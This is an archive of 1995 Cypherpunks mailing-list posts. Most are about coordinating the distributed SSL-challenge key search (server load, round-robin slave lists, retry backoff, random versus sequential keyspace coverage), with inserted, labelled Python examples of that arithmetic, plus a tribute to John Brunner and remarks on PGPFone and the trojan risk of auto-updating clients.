Message-ID: <8KWGmyczBiiT075yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Science fiction writer John Brunner died last Friday, August 25, from
a massive stroke, while attending the World Science Fiction Convention
in Glasgow, Scotland.

Among several other notable works, Brunner was the author of THE SHOCKWAVE
RIDER, a groundbreaking vision of the information age that inspired and
foresaw much that was pertinent to the Internet in general and the
Cypherpunks in particular.

Let us pause a moment to note his passing and honor his life and
contributions. 

   Alan Bostick             | "Oh.  You come to Heaven without a fortune?"
Seeking opportunity to      | "Yes."
develop multimedia content. | "Unfortunate."
Finger abostick@netcom.com  |      Roger Zelazny, LORD OF LIGHT
for more info and PGP public key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQB1AgUBMEIHReVevBgtmhnpAQG3IgL6A17RmOyCP/J4c/Dp5w1Qntv9/Ill90A/
OpulCQlBS4vBE5+yQ6nElJG0//13NNQ8/v73A/7hqeBEBZ6I0PG1rhdI8Iw5pqcd
74w4IYATmJ/YZe+IA/1GmqjwSohXcCbI
=Tf1e
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolab@censored.org>
Date: Mon, 28 Aug 95 09:07:01 PDT
To: Ray Arachelian <sunder@escape.com>
Subject: Re: Bet e$ on how long it will take for PGPFone to make it overseas!
In-Reply-To: <Pine.BSD/.3.91.950828111726.24612D-100000@escape.com>
Message-ID: <Pine.BSD.3.91.950828110205.6398A-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



I thought I saw a version over at ftp.hacktic.nl already. 
I tawt I taw a puddy tat. I did, I did taw a puddy tat!
And it's been in the incoming directory for all weekend too!

On Mon, 28 Aug 1995, Ray Arachelian wrote:

> $50 for 24 hours?  That's a bit too conservative.  I'd say within the 
> first 3 hours or less, and you can bet, non-final versions too will make 
> their way before that time. :-)
> 
> =================================================================93=======
>  + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
>   \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
> <--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
>   /|\  |    Just Say     |                                 |----\  /---- | 
>  + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
> =======/---------------------------------------------------------VI------/
>       /  I watched and weeped as the Exon bill passed, knowing that yet /
>      / another freedom vanished before my eyes.  How soon before we see/
>     /a full scale dictatorship in the name of decency? While the rest /
>    /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/
> 

Member Internet Society - Certified BETSI Programmer - WWW Page Creation
-------------------------------------------------------------------------
Carol Anne Braddock         <--now running linux 1.0.9 for your pleasure
carolann@censored.org             __  __     ____  ___       ___ ____
carolab@primenet.com             /__)/__) / / / / /_  /\  / /_    /
carolb@spring.com               /   / \  / / / / /__ /  \/ /___  /
-------------------------------------------------------------------------
A great place to start
My Cyber Doc...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Mon, 28 Aug 95 08:30:39 PDT
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Bet e$ on how long it will take for PGPFone to make it overseas!
In-Reply-To: <199508140120.VAA24979@bb.hks.net>
Message-ID: <Pine.BSD/.3.91.950828111726.24612D-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


$50 for 24 hours?  That's a bit too conservative.  I'd say within the 
first 3 hours or less, and you can bet, non-final versions too will make 
their way before that time. :-)

=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Mon, 28 Aug 95 09:24:04 PDT
To: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Subject: Re: SSL trouble
Message-ID: <9508281622.AA00486@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Piete Brooks writes:
>  Let's not get implementations confused with algorithms ...  We were
>  using ALPHA code when we started ....

Pardon me here, as I don't mean to belittle your considerable efforts, but I  
think it was a mistake to make such loud announcements (posted to sci.crypt  
for instance) when the software was alpha!  The software should have been  
tested and stable before the general public was invited to participate and  
"see how fast we can break SSL".  As expected, lots of people tried to  
participate and the software just couldn't handle it.

How many patched versions of the client software were distributed after the  
effort had started?  If you want to do it as fast as possible, you can't be  
constantly updating your client software.

>  With BETA clients, a hierarchy and select/poll loops, I reckon a
>  server would stand a chance.

I think protocol issues are a Red Herring.  If your server had been able to  
handle more than one client at a time it would have stood a chance.  Why  
didn't it fork?  Sure, forking isn't the most efficient way to handle  
multiple clients, but HTTP servers (as well as SMTP and FTP) manage to handle  
hundreds of thousands of requests each day that way.  One client at a time  
with a 30-second timeout was just plain dumb...


I would recommend thorough testing of the software on many platforms and with  
realistic loads before the next public effort (there are plenty of willing  
testers on the cypherpunks list).  I tried to join in the effort and after  
discovering that the client software was firing off multiple brutessl  
processes, I decided to wait until the client stabilized.  I attempted to  
reject the keyspace I allocated through the WWW interface, but that didn't  
even work!!



andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Mon, 28 Aug 95 11:58:08 PDT
To: Piete.Brooks@cl.cam.ac.uk
Subject: Re: SSL trouble
Message-ID: <9508281854.AA20060@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
> 
> One of the things that the latest brloop does is make a call to the master
> server asking for a list of servers to contact :-))
> 
> Note that it is a list, and it tries them in order (all A RRs).

Wouldn't this result in the slaves higher in the list being hammered?
Perhaps you want to do something similar to what the later releases of 
bind do with machines with multiple names, and round robin the list.
If you had a list with hosts A, B, and C, the first request would get
ABC, the next BCA, the next CAB, and the next back to ABC.  That would
distribute the work between the slaves a bit better.

> 
> > Then all of the transactions from that point would take place between the
> > brute and the slave:)
> 
> Currently just all the "allocate" transactions -- I haven't written my
> ACK reflector yet, so all ACKs go direct to the ACK master.
> 
> > The slaves would each be delegated large chunks of the keyspace,
> 
> No -- the slaves will not "be delegated" (as in pre-assigned address space),
> they will just ask the master for it as they need it.
> Sure, they'll do it in reasonable sized chunks, but not (2**16)/16 ....

Actually this is what I meant, that they would ask for it.  My idea would
be that when a slave is asked for keyspace, if they don't have enough
they'd ask for the next large chunk.  That way the central server doesn't
ever have to deal with small requests.
> 
> > but not keyspace/numslaves.  Maybe 1/16th or something like that, and could
> > ask for more when their space was depleted.  Periodically, perhaps when
> > requesting more key space, and/or when a timer pops, the slaves could report
> > results.
> 
> Nah - results still go direct pro tem.

You might consider it:)

> 
> > What I mean is that every so often they'd report even if they didn't need
> > more keyspace yet, iff they had any new stats to report.
> 
> Sure.
> 
> > The nice thing here is that the work of the master and of the slaves is
> > almost the same.
> 
> You got it !
> 
> > The slaves don't have to do the initial assignment of slave,
> (slave -> slaves I assume)
> 
> > and the master doesn't have to report results, but everything else
> > is the same.
> 
> Yup -- code sharing !
> 
> > With careful design you could use the same daemon for both
> > with a command line argument to tell it if it was the master (-m) or the
> > slave (-s).
> 
> Well, not even that !
> 
> The slaves don't have the config file with the key info in it ...
> 
> > Of course I'm sure you see that this allows you to add as
> > many levels as you want to the hierarchy.
> 
> Indeed.
> 
> BUT ....
> 
> These cache servers are asking for non trivial amounts of keyspace.
> As such there should not be *too* many, and they need to be "managed" ...
> If one crashes, the logs need to be scanned to see how to restart it (so that
> it starts by doling out the segments that it had not sub-doled to its clients).

Quite right.  I'd assume that the first level list of slaves would be controlled
by you.  If you're careful enough a slave should be able to go down and come
back up without losing any state at all.  All brutes/slaves talking to it
should be able to continue on with no loss of information.  I would put 
an exponential backoff on the time between retries for the brutes talking
to the slaves as well as the slaves talking to the master.  (With a limit
for the amount of backoff of course.)  If you can't talk to someone you
might sleep for 8 seconds and retry, if you still couldn't back off to 16,
then 32, then 64, then 128, etc...the maximum might be somewhere around ten
or fifteen minutes, so that within ten or fifteen minutes of crashing and
being restarted everything would be humming along with no manual intervention
required on any of the lower levels.

> 
> > A slave doesn't care whether a slave or a brute talks to it.
> 
> Indeed -- that's how it was designed ...
> 
> However, note that with big cache servers (as opposed to Local CPU Farm servers
> where all clients are the same "ID") reports of sub-allocation have to be
> passed back to the root :-(

That's a good point.  If you want to keep track of who has what, it all has
to get back to the root eventually.  If you use my idea of having the
slaves cache the information until the next time they'd be contacting the
root anyway, (or whenever the timer elapses,) then you greatly cut down
on the number of small packets seen by the root, (and each level of slaves
when there's a hierarchy).

> 
> > You could make the slave software available as well, and a site with many
> > machines could have only the slave contact the master to get assigned a
> > slave to talk to, and could configure all of their brutes to talk to
> > their own slave.
> 
> Indeed -- the Local CPU Farm cache server is just about ready for ALPHA testers
> 
> > Software like this is easy to write, (and fun), and we should go for it:)
> 
> Done ...
> 
> > Of course I do everything like this in C++, but I suppose perl would be the
> > most portable.  It's a shame it's so aesthetically displeasing to the eye.
> 
> Yeah -- but being based on C, C++ didn't stand much chance ...
> 
> > perl's never a pleasant read.
> 
> ... but better than C++ -- sure.

<snicker;>  Sounds like we could have a religious war if we wanted, but this
isn't the right list for it:)  (sigh;) Maybe we should move this portion of
the discussion to alt.my.favorite.language.rules.and.yours.of.course.sucks.
I'm not really a snob about it...I still think cobol's great for some 
purposes, I just prefer coding in C++.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/
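
The list rotation and capped retry schedule described in the message above, as an added Python example (not part of the original post and not the brloop or server code).  The class and function names, the 8-second first delay and the 600-second cap are assumptions taken from the figures in the message.

```python
"""Rotated slave lists and capped exponential backoff, simulated without sleeping.

Added illustration; every name here is this example's own.
"""
from collections import Counter, deque


class Master:
    """Hands each caller the full slave list, rotated one place per request."""

    def __init__(self, slaves):
        self._ring = deque(slaves)

    def server_list(self):
        current = list(self._ring)
        self._ring.rotate(-1)  # ABC -> BCA -> CAB -> ABC
        return current


def first_choice_counts(slaves, requests, rotate=True):
    """Count how often each slave is the first entry a client is handed."""
    master = Master(slaves)
    counts = Counter()
    for _ in range(requests):
        offered = master.server_list() if rotate else list(slaves)
        counts[offered[0]] += 1
    return dict(counts)


def backoff_delays(first=8, cap=600):
    """Yield 8, 16, 32, ... seconds between retries, never more than `cap`."""
    delay = first
    while True:
        yield min(delay, cap)
        delay = min(delay * 2, cap)


def reconnect_time(outage, first=8, cap=600):
    """Simulate one client whose first attempt fails at t=0.

    The server comes back at t=`outage` seconds.  Returns the time of the
    first successful retry and the number of retries it took.
    """
    now, retries = 0, 0
    for delay in backoff_delays(first, cap):
        now += delay          # sleep, then try again
        retries += 1
        if now >= outage:     # server is reachable again
            return now, retries


def worst_lag(max_outage, first=8, cap=600):
    """Longest gap between the server returning and the client noticing,
    over every whole-second outage length up to `max_outage`."""
    return max(reconnect_time(o, first, cap)[0] - o
               for o in range(1, max_outage + 1))


if __name__ == "__main__":
    print("rotated :", first_choice_counts(["A", "B", "C"], 9))
    print("fixed   :", first_choice_counts(["A", "B", "C"], 9, rotate=False))
    for outage in (100, 3600):
        t, n = reconnect_time(outage)
        print(f"outage {outage:5d}s -> reconnected at {t}s after {n} retries")
    print("worst lag over outages up to 6h:", worst_lag(6 * 3600), "s")
```

The lag after a restart is always shorter than the last delay slept, so it never exceeds the cap; that is the "within ten or fifteen minutes" property the message relies on.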




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 28 Aug 95 09:14:42 PDT
To: lwp@mail.msen.com
Subject: Re: Turing test novel: "Galatea 2.2"
In-Reply-To: <oJVQwMz2Bo3D083yn@mail.msen.com>
Message-ID: <199508281614.MAA22790@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Sounds interesting, but this is material for an AI list, not a list
that discusses cryptography.

Lou Poppler writes:
> Reviewed in The New Yorker (August 21&28 issue) is the novel 
> "Galatea 2.2" by Richard Powers, wherein a neural net is nurtured
> by an English Literature professor "to counterfeit human responses
> to the Master's Comprehensive Exam, which calls for the interpretation
> of set texts".  The review makes me want to read this book.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Sun, 27 Aug 95 20:04:56 PDT
To: scmayo@rschp1.anu.edu.au (Sherry Mayo)
Subject: Re: SSl challenge - it was fun!
In-Reply-To: <9508280028.AA28532@toad.com>
Message-ID: <199508280134.AA19987@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>> One problem with being in Australia was that I was asleep when
>> new software updates were announced and tended to get them later
>> than everyone else, and because of this an auto-update would
>> be particularly useful to me if we do this again.

I would be extremely wary of this as accepting code written by someone else to
automatically run on your machine is bad. I realise the non unix people are
forced to use binaries and have no way of knowing what in hell is in the nice
software, but Unix people have a responsibility to themselves and the others
on their machines/networks to at least check that everything is ok. If they do
not have the expertise, they will hear of it soon enough when others scan the
offered code.

Having source code to these programs is essential, from a security and snub
the TLAs point of view. People need to be educated how to write systems
to use crypto and they need to be able to check no trojans are included.

Mark
mark@lochard.com.au
opinions are rumoured to be mine.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Mon, 28 Aug 95 13:12:48 PDT
To: ab411@detroit.freenet.org
Subject: Re: SSL trouble
Message-ID: <9508282009.AA20089@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


David Conrad wrote, quite well:
> 
> Patrick Horgan <patrick@Verity.COM> writes:
> >I did a distributed scheme for something else that had two levels, a master
> >and a group of slaves.  Only the slaves talked to the master.  For this 
> >effort I think a variation of the idea would be better.  Have all of the
> >brutes contact the master, who will, in the first transaction assign them
> >to the next slave in a round-robin fashion.
> 
> Why not just have the brutes pick a slave at random?  Of course, you need
> to give them a complete list of slaves to choose from.  But then the only
> difference between the master and the slaves will be that the master
> doesn't get any keyspace (it's got it all to begin with) and doesn't
> report any results upward.
> 

I think that this is a quite good idea with one caveat.  That we use a 
good random algorithm.  As people on this list are quite aware, many
algorithms that ship in libraries of commercial OSs are flawed in one
way or another.

Perhaps a combination of the two: give the whole list rotated in a
round-robin fashion, and let the client do with it as they will.  There
are enough coders on this list that we'll soon see independently 
developed versions of the client software, (although a published 
protocol for talking with the slaves would be nice), and some might
like to draw the first from the list, another randomly choose one,
etc...

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 28 Aug 95 14:33:05 PDT
To: cypherpunks@toad.com
Subject: Re: SSL trouble
Message-ID: <199508282130.OAA17500@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Several people have suggested random keyspace selection instead of servers.
The problem is that there's a high probability that the search will fail to
find the correct key.  If you split the keyspace into n segments, and randomly
select k of them, the probability of failure p = ((n-1)/n)**k ; for k=n, 
p approaches 1/e (.367) as n becomes large, and 10 is close enough to large
that you don't gain much by having independent groups that agree not to overlap
in their own 10% of the keyspace.  For k=2n (random-searching the space
about twice), the probability of failure is still e**-2, about 13%.  You
need a coordinated search.

>Why not just have the brutes pick a slave at random?  
>Of course, you need to give them a complete list of slaves to choose from. 

That more or less works, assuming you can distribute the list of slaves
along with the code; you still hit the slaves' DNS servers unless you
also distribute IP addresses for the slaves to use (which is probably fine
as long as people get the addresses beforehand.)
You could get fancy and have a DNS server hand out slave addresses round-robin
for a dummy address slave.cracker.org.

The main failure mode seems to have been misconfigured clients grabbing the
single-threaded server for a long time; it may be worth using a multi-threaded
server, or alternatively a single-threaded server that has a fast timeout 
for how long it will talk to a client.

I gather there was some protection in the code against dishonest clients,
but a malicious attack would be to falsely ACK large portions of
the search space (especially the portion containing the real answer,
if the attacker knows it).  
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 28 Aug 95 14:33:23 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: improving the distributed computation
Message-ID: <199508282130.OAA17520@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:43 AM 8/25/95 -0400, you wrote:
>1) Abandon the central command way of doing things.  Little if any
>communication is required for this computation, it should be
>self-distributing to and between volunteer sites.  That makes it ideal
>for implementation as a safe virus. 

Doling out keyspace _does_ require central coordination, though
the job can be delegated to _trusted_ volunteers, or delegated
with redundancy to semi-trusted ones.

As far as safe viruses go, I've had more free lunches than safe viruses,
though I've been offered both out of "charity".  Some of the lunches
were good, and charitable; the viruses have been, at best, mostly harmless.
Perhaps under Safe-Tele-Java-Script it will be possible to send
self-modifying self-reproducing scripts around a network to unsuspecting
machines, but I doubt it.

>2) Give these computations a defined and limited lifetime.  The problem
>you have with old versions is because they don't die automatically or
>even check to see if they are up-to-date and update themselves.

Yeah.  In this case, the lifetime of the versions was less than the
expected lifetime of some of the searches.  Automated version-checking would
help, but the version changes made it difficult to communicate even simple
requests like "Give me a number".  Perhaps it would make sense for version
upgrading to include changing the server's TCP port so the old versions
don't hose the servers for the new versions.

>3) Use randomness to break up the search space and redundantly perform
>the computation.  This should eliminate the problems with malicious
>key-space requests, etc.

Randomness doesn't help much, since it's hard to be sure you
sweep the whole keyspace.  Redundancy does help, but it's still tough
to protect against sufficiently malicious attackers.

>4) Use feedback in the form of selective survival/replication to
>optimize the search and allocate search space.  If a processor goes
>quickly, give it more to do - if it goes slowly, give it less.  This
>will produce an overall system that adapts with time to the changes in
>network and system usage so as to optimize overall performance as a
>function of time.

You could do that.  But simply asking for more numbers after you've
finished the previous batch accomplishes much the same thing;
special tuning may be more useful for folks with MasPars than 486s,
where redundantly giving out unacked search space can do more.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Mon, 28 Aug 95 11:53:07 PDT
To: cypherpunks@toad.com
Subject: Re: SSL trouble
Message-ID: <199508281852.OAA22478@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




-----BEGIN PGP SIGNED MESSAGE-----

Patrick Horgan <patrick@Verity.COM> writes:
>I did a distributed scheme for something else that had two levels, a master
>and a group of slaves.  Only the slaves talked to the master.  For this 
>effort I think a variation of the idea would be better.  Have all of the
>brutes contact the master, who will, in the first transaction assign them
>to the next slave in a round-robin fashion.

Why not just have the brutes pick a slave at random?  Of course, you need
to give them a complete list of slaves to choose from.  But then the only
difference between the master and the slaves will be that the master
doesn't get any keyspace (it's got it all to begin with) and doesn't
report any results upward.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEIKkhEcrOJethBVAQHjVQP/RGGxRkUp2WB1/yWngAIrGG3m7Xo6CG17
2sODkkDDGJYmGV+wDBLWObc7VS30MHrPfMLT7Cp7yI/AgYgDJrZ/1SRKw2OuVFqI
kgL8hICRxqe76IvmlFAa/pFXVgYiu+WHsMlSEKYlpLa7T424HUdAD21Rc2Dvqioi
zMqmhgdn22I=
=QAi2
-----END PGP SIGNATURE-----

--
David R. Conrad, ab411@detroit.freenet.org, http://www.grfn.org/~conrad
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
Jerry Garcia, August 1, 1942 - August 9, 1995.  Requiescat in pace.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Mon, 28 Aug 95 11:55:00 PDT
To: cypherpunks@toad.com
Subject: Re: Pre-allocating key segments
Message-ID: <199508281854.OAA23029@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




-----BEGIN PGP SIGNED MESSAGE-----

Piete Brooks <Piete.Brooks@cl.cam.ac.uk> writes:
>I wrote:
>> Not only that, but the client ought to allocate some keyspace before it
>> needs it, as I think one other cpunk suggested.
>
>I'd prefer to keep the number of segments "lost" if a brloop ceases.

Keep down, I guess you meant.

Regarding the local farm software:
>... if any keys were allocated to machines which failed to ask for another
>segment -- you should assume that that segment was not searched.

I agree that is the best policy -- it fails safe -- but I still think the
prefetching of some more segments would be useful.  The goal is to suck up
as many idle cycles as is practical.

>> For instance, if it has
>> four segments allocated and it's done three of them, it should fork a
>> process to begin requesting four more segments *while* it is scanning
>> the last segment, rather than waiting until after it is done and leaving
>> the machine idle until it can alloc more keys.
>
>That means that if it crashes, 8 segments are left unACKed :-(

And if it had grabbed 8 segments to begin with and crashed, it still
would have been 8 segments left unACKed.

Plus, it's only 8 segments unACKed if it crashes before it finished that
last segment, since it will start trying to ACK the first four segments
when it finishes the fourth -- at the same time starting on the next
four segments.

Would you see it any differently if I had said, "For instance, if it has
two segments allocated and it is halfway through the second segment, it
should request two more segments *while* it is scanning the last segment"?

Keeping in mind that it will still ACK the first bunch of segments when
it finishes them.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEIOnBEcrOJethBVAQHUfQP+OUA+iC7sTp2CVCZ5YqtM7ouNykhyx7Nm
agcTHN6FFZUOxDmAogiY/Op/SLBZbgtmACC3RSG0cEHwzCQJZ6jeUrTe9g3qU/Vm
jHRn8PurOUYE188QnZSGEj0qcZbeoYJoLE4qOcrd7SbizIcZoWk/WVA4STZwEHuH
wHHusza6Un4=
=UOqi
-----END PGP SIGNATURE-----

--
David R. Conrad, ab411@detroit.freenet.org, http://www.grfn.org/~conrad
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
Jerry Garcia, August 1, 1942 - August 9, 1995.  Requiescat in pace.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damien.Doligez@inria.fr (Damien Doligez)
Date: Mon, 28 Aug 95 06:11:46 PDT
To: cypherpunks@toad.com
Subject: Re: SSL trouble
Message-ID: <9508281310.AA21354@couchey.inria.fr>
MIME-Version: 1.0
Content-Type: text/plain


>From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>

>We were using ALPHA code when we started ....

I didn't realise that.


>(4) is still applicable isn't it ?
>What tells people to stop, or do they go on for ever ?

A message in a newsgroup, a mailing list, or a web page.  Even if you
can mount a denial-of-service against this, it will only make people
continue the search uselessly.  It won't prevent you from finding the
key.


>>The main drawback of the random search is that the expected running "time"

>where "expected" is some loose average .....

Nope.  It's what I get when I do the math (basic probability theory)
to find the expected running time.  But I could be wrong.  I'll try to
write it in TeX and put it on my web page.


>>I suspect that sequential searching from a random starting point would be
>>much worse in the case of many independent searchers.

>Convince me (please) ....

That would be hard because I've been thinking about it, and I'm less
and less convinced myself.


>> In conclusion, I think random searching is the way to go.
>It has its advantages -- yes. Did you use it for Hal1 ?  :-))

No, but I had few machines and fast connections (and even then, I did
have some network problems).  But if you think sequential searching
can work, let's do it.  I don't think we have to worry about
deliberate attacks for the moment, and the factor of two is
significant.  My previous message was based on the assumption that it
would be hard to get rid of the server overload.

Maybe we should use random searching as a fallback mode in case of
network problems.  It cannot hurt, except that it makes the programs
more complex.

-- Damien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Mon, 28 Aug 95 13:14:43 PDT
To: Will French <wfrench@interport.net>
Subject: Re: SSL trouble
In-Reply-To: <199508262332.TAA26817@interport.net>
Message-ID: <9508282013.AA15087@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


Will French writes
>>>   Please don't do anything like this.  This will prevent
>>> people like me who prefer the "random" method from
>>> participating.
>
>> You can't use the random method if the CRACK is using a
>> sequential search. It just doesn't fit!
>
>  Hehe...  I've always been a bit of a misfit.
>
>> You can't ACK something which has not been allocated to you.
>
>  But I could announce it on the list.

Then what do you care about the group's procedures?  It doesn't
"prevent you from participating" --- you *aren't* participating.
You're attempting to solve the problem on your own.

Statistically, the "random" methods are no different than everyone just
working independently at solving the problem.

I, too, don't recall my statistics well enough, but let me take a shot
at it, and anyone who wants to, please check me...

The probability of having failed to search a particular segment (the
one with the key) after selecting k of n segments at random with
replacement is (1-1/n)^k, whereas in a sequential search from a random
starting point, (or, equivalently, random without replacement) the
probability is k/n.

Assume the segments are farmed out in 2^24 segments of 2^16 keys each
(I don't recall what the current programs use).  In the sequential case,
it's even money you'll find the key after searching 8,388,609
segments.  In the random case, it's not even money until 11,629,080
segments --- 39% longer.  It's when you're "unlucky" that the random
case gets *much* worse.  To search 90% of the keyspace takes 15,099,495
sequential searches, but 38,630,967 --- a 156% difference.

Here's the table:

% k-space	  random	sequential	percent
searched	  method	  method	difference
--------	----------	---------	----
10		   1767657	  1677722	  5
25		   4826505	  4194305	 15
50		  11629080	  8388609	 39
75		  23258160	 12582913	 85
90		  38630967	 15099495	156
99		  77261933	 16609444	365
99.9		 115892899	 16760439	591

Changing the segment size doesn't affect the results very much, as
a table for 10 bit segments shows:

50		 744261117	536870912	 37
90		2472381916	966367641	156

The random method is a little more than 1/3 worse in the typical
case, but *lots* worse in the worst cases.
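
The arithmetic behind the table above, and behind the p = ((n-1)/n)**k figures in Bill Stewart's earlier message, as an added Python example (not code from either post).  Function names are this example's own; "needed" is taken to mean the smallest k whose success probability exceeds the target, which is the rounding that reproduces the first table.

```python
"""Keyspace coverage: random segment picks versus a coordinated sweep.

Added illustration; nothing here comes from the brutessl/brloop software.
"""
import math
import random
from fractions import Fraction


def miss_probability(n, k):
    """P(the segment holding the key is never picked) after k uniform picks
    with replacement out of n segments, i.e. ((n-1)/n)**k."""
    return math.exp(k * math.log1p(-1.0 / n))


def random_segments_needed(n, coverage):
    """Smallest k with 1 - (1 - 1/n)**k > coverage (picks with replacement)."""
    k = math.log(float(1 - coverage)) / math.log1p(-1.0 / n)
    return math.floor(k) + 1


def sequential_segments_needed(n, coverage):
    """Smallest k with k/n > coverage when no segment is searched twice."""
    return math.floor(coverage * n) + 1


def overhead_percent(n, coverage):
    """Extra work of the random method over the coordinated one, in percent."""
    r = random_segments_needed(n, coverage)
    s = sequential_segments_needed(n, coverage)
    return round(100 * (r - s) / s)


def coverage_table(n, levels):
    """Rows of (coverage, random k, sequential k, percent difference)."""
    return [(c, random_segments_needed(n, c),
             sequential_segments_needed(n, c), overhead_percent(n, c))
            for c in levels]


def simulate_miss_rate(n, k, trials, seed=1995):
    """Monte Carlo check of miss_probability on a small keyspace.

    Segment 0 stands in for the one holding the key; by symmetry any fixed
    segment gives the same answer.
    """
    rng = random.Random(seed)
    misses = sum(
        all(rng.randrange(n) != 0 for _ in range(k)) for _ in range(trials)
    )
    return misses / trials


LEVELS = [Fraction(10, 100), Fraction(25, 100), Fraction(50, 100),
          Fraction(75, 100), Fraction(90, 100), Fraction(99, 100),
          Fraction(999, 1000)]

if __name__ == "__main__":
    n = 2 ** 24  # 2^24 segments of 2^16 keys, as assumed in the message
    print(f"{'coverage':>9} {'random':>12} {'sequential':>12} {'diff %':>7}")
    for c, r, s, pct in coverage_table(n, LEVELS):
        print(f"{float(c) * 100:>8.1f}% {r:>12} {s:>12} {pct:>7}")
    print("miss, n=10, k=10 :", round(miss_probability(10, 10), 4))
    print("simulated        :", simulate_miss_rate(10, 10, 20000))
    print("miss, k=2n       :", round(miss_probability(10 ** 6, 2 * 10 ** 6), 4))
```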




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Sun, 27 Aug 95 23:51:51 PDT
To: mark@lochard.com.au (Mark)
Subject: Auto-update (was: Re: SSl challenge - it was fun!)
In-Reply-To: <199508280134.AA19987@junkers.lochard.com.au>
Message-ID: <199508280649.QAA12896@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


Sorry if I stuff up; I'm trying for PGP-signed and the PGP is on
a different machine...

-----BEGIN PGP SIGNED MESSAGE-----

Hello Mark <mark@lochard.com.au>
  and scmayo@rschp1.anu.edu.au (Sherry Mayo)
  and cypherpunks@toad.com

...[asking for an auto-update]...

